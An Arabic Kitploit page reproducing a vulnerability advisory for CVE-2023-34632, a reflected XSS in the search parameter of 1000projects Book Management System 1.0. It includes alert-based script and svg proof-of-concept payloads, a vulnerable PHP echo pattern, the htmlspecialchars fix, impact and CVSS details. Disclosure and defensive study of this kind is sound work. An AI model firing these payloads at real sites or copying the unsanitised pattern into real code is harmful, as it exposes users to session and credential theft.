Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-34632 — XSS المنعكسة في 1000projects Book Management System 1.0 | Kitploit
أدوات/GitHubGitHub/ssophiz/cve-2023-34632
تحليل الثغرات الأمنيةاستغلال تطبيقات الويبأمن الويبالأوراق والأبحاثالتعلم والتعليم
GitHubssophiz/cve-2023-34632

CVE-2023-34632

XSS المنعكسة في 1000projects Book Management System 1.0

عرض المستودع
منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-34632

ثغرة XSS منعكسة في 1000projects Book Management System 1.0

صورة

CVE-2023-34632

ثغرة XSS المنعكسة (Cross-Site Scripting) في 1000projects Book Management System 1.0


الوصف

تم اكتشاف ثغرة XSS منعكسة (Cross-Site Scripting) في 1000projects Book Management System الإصدار 1.0. توجد الثغرة في وظيفة البحث (index.php)، حيث ينعكس إدخال المستخدم عبر مُعامل search في استجابة HTTP دون تعقيم مناسب أو ترميز للمخرجات.

يمكن للمهاجم إنشاء رابط خبيث يحتوي على كود JavaScript. عند نقر الضحية على الرابط، يتم تنفيذ السكربت في سياق جلسة متصفح الضحية، مما قد يؤدي إلى اختطاف الجلسة أو سرقة بيانات الاعتماد أو هجمات التصيّد.


المنتج المتأثر

العنصرالتفاصيل
المورّد1000projects
المنتجBook Management System
الإصدار1.0
المكوّنindex.php (وظيفة البحث)
التقنيةPHP / MySQL

تفاصيل الثغرة


إثبات المفهوم

الحمولة (Payload)

root@kitploit:~
http://localhost/book-management/index.php?search="><script>alert('CVE-2023-34632')</script>

خطوات إعادة الإنتاج

  1. ثبّت XAMPP/WAMP وانشر Book Management System 1.0 في جذر الويب
  2. انتقل إلى التطبيق في المتصفح
  3. أدخل الحمولة التالية في مربع البحث (أو قم بزيارة الرابط المعدّ أعلاه):
    root@kitploit:~
    "><script>alert('CVE-2023-34632')</script>
    
  4. لاحظ ظهور نافذة تنبيه JavaScript، مما يؤكد ثغرة XSS

لقطة الشاشة

XSS PoC

حمولات بديلة

root@kitploit:~
">
root@kitploit:~
"><svg/onload=alert('CVE-2023-34632')>

السبب الجذري

تُدمج قيمة مُعامل search مباشرة في استجابة HTML دون أي تعقيم. لا يطبّق كود PHP الدالة htmlspecialchars() أو أي ترميز مخرجات مكافئ قبل عرض إدخال المستخدم.

نمط الكود الثغري

root@kitploit:~
// Vulnerable - user input directly rendered in HTML output
$search = $_GET['search'];
echo "Search results for: " . $search;

المعالجة

طبّق ترميز مخرجات مناسبًا لجميع المدخلات المقدمة من المستخدم قبل عرضها في سياق HTML:

root@kitploit:~
// Fixed - proper output encoding
$search = htmlspecialchars($_GET['search'], ENT_QUOTES, 'UTF-8');
echo "Search results for: " . $search;

الأثر

  • اختطاف الجلسة — يمكن للمهاجم سرقة ملفات تعريف ارتباط الجلسة عبر document.cookie
  • سرقة بيانات الاعتماد — يمكن حقن نماذج تسجيل دخول مزيفة لاصطياد بيانات اعتماد المستخدم
  • توزيع البرمجيات الخبيثة — يمكن إعادة توجيه الضحايا إلى مواقع ويب ضارة
  • تشويه الصفحة — يمكن التلاعب بمحتوى الصفحة في متصفح الضحية

الجدول الزمني

التاريخالحدث
2023-06اكتشاف الثغرة
2023-06حجز CVE-2023-34632 بواسطة MITRE
2026-02الإفصاح العام

الإسناد

المكتشف: Wonkyeom Kim (@ssophiz)


المراجع

  • 1000projects Book Management System
  • CWE-79: عدم التحييد السليم للمدخلات أثناء توليد صفحة الويب
  • OWASP - البرمجة النصية عبر المواقع (XSS)
تنزيل الأداة
العنصرالتفاصيل
معرّف CVECVE-2023-34632
النوعCWE-79: عدم التحييد السليم للمدخلات أثناء توليد صفحة الويب (XSS منعكسة)
ناقل الهجومشبكة
تعقيد الهجوممنخفض
الصلاحيات المطلوبةلا شيء
تفاعل المستخدممطلوب (ينقر الضحية على رابط معدّ)
درجة CVSS 3.16.1 (متوسطة)
متجه CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N